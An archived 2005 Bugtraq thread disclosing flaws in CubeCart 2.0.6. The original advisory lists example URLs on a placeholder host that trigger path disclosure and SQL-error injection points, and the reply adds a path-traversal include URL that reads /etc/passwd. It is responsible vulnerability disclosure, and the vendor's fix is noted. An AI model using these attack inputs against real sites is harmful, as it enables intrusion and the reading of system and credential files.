OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
RE: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure

From: Ravish Ahuja (ravishxeonext.com)
Date: Wed Apr 06 2005 - 14:43:36 CDT


Hello,

http://www.victimsite.com/index.php?&language=f00bar.php

Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion
(include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php
on line 147

This is path disclosure but it can also be used for malicious file include.

http://www.victimsite.com/index.php?language=../../../../../etc/passwd

Regards,
Ravish
http://www.xeonext.com

-----Original Message-----
From: John Cobb [mailto:johncnobytes.com]
Sent: Sunday, February 06, 2005 11:09 PM
To: bugtraqsecurityfocus.com
Subject: [NOBYTES.COM: #6] CubeCart 2.0.6 - Information Disclosure

Hello All,

I have discovered a number of remote vulnerabilities in: CubeCart 2.0.6.

Authors Site: http://www.cubecart.com

CubeCart is described by its authors as:

'What is CubeCart?

CubeCart is an eCommerce script written with PHP & MySQL. With CubeCart you
can setup a powerful online store as long as you have hosting supporting PHP
and one MySQL database.'

+-[Examples:]--------------------------------------------------+

[1]------------------------------------------------------------+

http://www.victimsite.com/index.php?&language=f00bar.php

Warning: Failed opening '/var/www/html/admin/lang/f00bar.php' for inclusion
(include_path='.:/usr/share/pear') in /var/www/html/admin/settings.inc.php
on line 147

[2]------------------------------------------------------------+

http://www.victimsite.com/index.php?&PHPSESSID='

Warning: Failed to write session data (files). Please verify that the
current setting of session.save_path is correct (/tmp) in Unknown on line 0

[3]------------------------------------------------------------+

http://www.victimsite.com/tellafriend.php?&product='

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/tellafriend.php on line 46

[4]------------------------------------------------------------+

http://www.victimsite.com/view_cart.php?add='

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_cart.php on line 49

[5]------------------------------------------------------------+

http://www.victimsite.com/view_product.php?product='

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 53

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 63

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/view_product.php on line 144

+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 05/03/2005
Author(s) Informed on: 05/03/2005
Author(s) Response: 05/03/2005
Author(s) Fix: 05/04/2005

 

Regards

John Cobb

JohnCNoBytes.com

http://www.NoBytes.com